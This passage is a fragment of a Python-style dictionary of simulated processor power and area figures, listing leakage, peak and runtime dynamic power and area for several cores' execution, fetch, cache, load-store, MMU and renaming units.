'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.101894,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.164351,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0829587,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.349203,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.116537,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.05081,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00427388,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0309057,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.031608,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0309057,
'Execution Unit/Register Files/Runtime Dynamic': 0.0358818,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0651096,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.189802,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.18295,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000536579,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000536579,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000471689,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000184966,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000454051,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0019989,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00499,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0303855,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.93278,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0594428,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.103203,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.2451,
'Instruction Fetch Unit/Runtime Dynamic': 0.20002,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0383886,
'L2/Runtime Dynamic': 0.00921591,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.42306,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.58336,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.038368,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0383679,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.60424,
'Load Store Unit/Runtime Dynamic': 0.810945,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0946089,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.189218,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.033577,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0341529,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.120173,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.00974654,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.333961,
'Memory Management Unit/Runtime Dynamic': 0.0438995,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.862,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00459716,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0536725,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0582697,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.3053,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.00403571,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.205858,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0197495,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0947392,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.152811,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0771338,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.324684,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.105326,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.06483,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0037311,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00397379,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0303296,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0293886,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0340607,
'Execution Unit/Register Files/Runtime Dynamic': 0.0333624,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0649051,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.160929,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.13021,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00110915,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00110915,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000977048,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000384237,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00042217,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00361751,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0102421,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.028252,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 1.79707,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0917619,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.0959566,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.1028,
'Instruction Fetch Unit/Runtime Dynamic': 0.22983,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.058588,
'L2/Runtime Dynamic': 0.0164416,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 1.91964,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.352733,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0220812,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0220812,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.02391,
'Load Store Unit/Runtime Dynamic': 0.483711,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0544484,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.108897,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0193239,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0202021,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.111735,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0150482,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.301039,
'Memory Management Unit/Runtime Dynamic': 0.0352503,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 14.1406,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.00981479,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00439382,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0480758,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0622844,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 1.95773,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.222955,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.377807,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.2034,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
